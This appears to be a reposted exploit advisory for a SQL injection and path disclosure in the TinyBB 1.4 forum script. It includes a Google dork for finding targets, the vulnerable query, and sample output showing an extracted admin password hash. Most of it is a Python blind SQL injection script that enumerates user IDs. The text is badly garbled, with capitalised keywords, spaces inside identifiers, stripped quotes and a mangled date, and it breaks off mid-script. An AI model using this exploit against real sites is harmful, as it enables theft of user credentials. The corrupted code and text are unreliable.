TinyBB 1.4 SQL injection vulnerability and sensitive information leakage and repair

TiyBB is a simple free forum script. The SQL injection vulnerability in TinyBB 1.4 may cause sensitive information leakage.

# Exploit Title: TinyBB 1.4 SQL Injection + Path Disclosure

# Google Dork: "Proudly powered by TinyBB"

# Date: 7 then l 2011

# Author: swami

# Contact: flavio [dot] baldassi [at] gmail [dot] com

# Version: 1.4

# Tested on: Centos 5.5 with magic_quotes_gpc off

# Thanks to: ptrace.net

#

# From tinybb.net

#-------------------------

# "TinyBB is a free, simple bulletin board script. TinyBBs community

Is slowly growing and the number

# Of installis slowly rising. TinyBBs software is 100% free and so

Are our official add-ons ."

#

# SQL Injection [Fixed]

#-----------------------

# The vulnerability exist in/inc/viewthread. php file at line 3.

You can see below the $ _ GET [post] parameter isnt

# Properly sanitized.

#

# $ Check_thread = mysql_query ("SELECT * FROM 'tinybb _ Threads' WHERE

# 'Thread _ key' = $ _ GET [post] ") or die (mysql_error ());

#

# Path Disclosure [Not fixed]

#--------------------

# A remote user can access these files to cause the system to display

An error message that indicates the installation # path.

#1-http: // host/inc/login. php

#2-http: // host/inc/categories. php

#

# Swami @ swami-desktop :~ /Documents/py $./tinybb. py

#

# [+] TinyBB thread url:

Http: // 192.168.2.6/tinybb/index. php? Page = thread & post = 444709648

# [?] Set up a Proxy? [Y/n] y

# [+] Proxy ip: port: 127.0.0.1: 3128

# [+] Proxy is found to be working

# [+] Testing url:

Http: // 192.168.2.6/tinybb/index. php? Page = thread & post = 444709648

# [+] Url vulnerable: YES

# [+] Users into the db: 1

# [+] Executing blind SQL injection, this will take time...

#

# [+] UserId 76: admin: 64d7103eef2b14bbb2d0b57c38cc3fbee29ff72a

#

# [+] Done

#

#! /Usr/bin/python

#

Import sys

Import urllib. request

Def banner ():

Print (++)

Print (| ------------------------------ |)

Print (| TinyBB 1.4 Blind SQL INjector |)

Print (| ------------------------------ |)

Print (+ by swami +)

Def setProxy (ip ):

Try:

Proxy = urllib. request. ProxyHandler ({http: // + str (ip )})

Opener = urllib. request. build_opener (proxy)

Opener. open (http://www.google.com)

Print ([+] Proxy is found to be working)

Except t:

Print ([-] Proxy doesn work)

Print ([-] Exit ...)

Sys. exit (1)

Return opener

Def testUrl (url, handle ):

Print ([+] Testing url: + url)

Try:

Req = handle. open (url)

Req = req. read (). decode (UTF-8)

Except t:

Print ([-] + url + is not a valid url)

Print ([-] Exit ...)

Sys. exit (1)

Return req

Def urlVulnerable (url, clean, handle ):

Sys. stdout. write ([+] Url vulnerable :)

Try:

Req = handle. open (url + "")

Req = req. read (). decode (UTF-8)

Except t:

Sys. exit ([-] Url typing error)

If len (clean)> len (req ):

Sys. stdout. write (YES)

Sys. stdout. flush ()

Else:

Sys. stdout. write (NO [-] Exit ...)

Sys. stdout. flush ()

Sys. exit (1)

Def getTrueValue (url, handle ):

TrueValue = handle. open (url + "% 20and % 201 = 1 ")

Return len (trueValue. read (). decode (UTF-8 ))

Def getNUsers (url, trueValue, handle ):

Users = list ()

Sys. stdout. write ([+] Users into the db :)

Sys. stdout. flush ()

For userid in range (0, 1,100 ):

Inject = url + "% 20and % 20 (SELECT % 201% 20 FROM % 20 members % 20 WHERE % 20id =" + str (userid) + ") = 1"

Try:

Req = handle. open (inject)

Req = req. read (). decode (UTF-8)

Except t:

Print ([-] Somenthing went wrong)

Sys. exit (1)

If len (req) = trueValue:

Users. append (userid)

Sys. stdout. write (str (len (users )))

Re